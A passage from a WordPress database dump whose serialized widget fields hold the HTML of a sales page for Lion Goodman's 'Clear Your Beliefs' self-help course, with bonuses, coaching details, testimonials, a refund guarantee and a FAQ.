href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a></p>\n\n<p>You''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" </p>\n<p>Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. </p>\n<p>It''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!</p>\n\n<p>&nbsp;</p>\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.</p>\n<p><em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.</p>\n<p>Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.</p>\n<p><strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong></p>\n<h1 id="package"></h1>\n<p style="text-align: right"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n<p>&nbsp;</p>\n\n<h1>Purchase Today and You''ll Receive:</h1>\n<p><strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.</p>\n<h3 style="font-size: 20px">Plus: <em>The Entire BONUS Collection:</em></h3>\n\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<em><strong>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\n<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>Optional:</strong> Professional Coaching Sessions.\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>About Lion Goodman</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.</p>\n<p>He is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em></p>\n<p>He is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em></p>\n<p>Lion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<p><em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em></p>\n<strong>– G. J., software developer</strong>\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em></p>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em></p>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em></p>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em></p>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em></p>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em></p>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em></p>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em></p>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I uncovered beliefs I didn''t know I had, including: "I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God." It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em></p>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em></p>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em></p>\n<strong>– M.M., International Business Consultant</strong>\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>Frequently Asked Questions</h1>\n\n<p><strong>Q: What is a virtual course?</strong></p>\n\n<p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p>\n\n<p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<p><strong>Q: How long will I have access to the course?</strong></p>\n\n<p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<p><strong>Q: Are there scholarships available?</strong></p>\n\n<p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com">info@clearyourbeliefs.com</a>, with a description of your circumstances and your offer of what you can pay.</p>\n\n<p><strong>Q: What is your refund policy?</strong></p>\n\n<p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank">ClearYourBeliefs.com</a>, <a href="http://www.BeliefCloset.com" target="_blank">BeliefCloset.com</a>, or <a href="http://www.ConfusedAboutLove.com" target="_blank">ConfusedAboutLove.com.</a></p>\n\n<p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n<p>// </p>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:2:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:2:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1888, 2164, 'panels_data', 'a:3:{s:7:"widgets";a:3:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:825:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n\n<div class="quot" style="text-align: center; margin: 0px auto ! important;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\n<div class="clear"></div>\n\n&nbsp;";s:6:"filter";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:63409:"\n\n<p>&nbsp;</p>\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.</p>\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<p>&nbsp;</p>\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;</p>\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I''m convinced!Take me to the program description,tell me about all the cool bonuses I''ll get,and how much it costs...</a></h1>\n<p>&nbsp;</p>\n<h1>Why Does This Happen?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p>\n<p>Neuroscientists call the brain''s ability to change over time "neuroplasticity."</p>\n<p>It can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n<p>&nbsp;</p>\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></p>\n<p>If you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<p>&nbsp;</p>\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a>Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p><strong>We literally create our reality with our beliefs.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.</p>\n<p>&nbsp;</p>\n<h1>Upgrade Your Human Operating System</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong></p>\n\n<strong><em>I''m not enough.</em></strong>\n<strong><em>I can''t do it.</em></strong>\n<strong><em>I''m not worthy.</em></strong>\n<strong><strong><em>I''ll never be like them.</em></strong></strong>\n<strong><em>I''m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There''s something wrong with me.</em></strong>\n<strong><em>I''m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.</p>\n<p><strong>Here''s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<p>&nbsp;</p>\n<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px;margin-right: 20px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p>The same thing is true in your subconscious mind:</p>\n<p><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></p>\n<p><strong>It''s that simple.</strong></p>\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n\n<p style="text-align: left">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\n<p>When you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n\n<p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<p><strong> It''s that simple.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Beliefs Are Difficult To Change</h1>\n\n<p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p>\n\n<p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p>\n\n<p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p>\n\n<p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p>\n\n<p>&nbsp;</p>\n<h1>Why We React The Way We Do</h1>\n\n<p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p>\n\n<p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p>\n\n<p>\n</p>\nWhy did I say that?\nWhat''s wrong with me?\nWhy didn''t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<p><em></p>\n\n<p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p>\n\n<p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p>\n\n<p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n\n<p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p>\n\n<p><strong>Here''s why:</strong></p>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\n<p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p>\n\n<p>&nbsp;</p>\n<h1>Here''s Some Good News</h1>\n\n<strong><strong><strong>First: It''s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\n<p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p>\n\n<p>You can now <em><strong>Clear Your Beliefs – 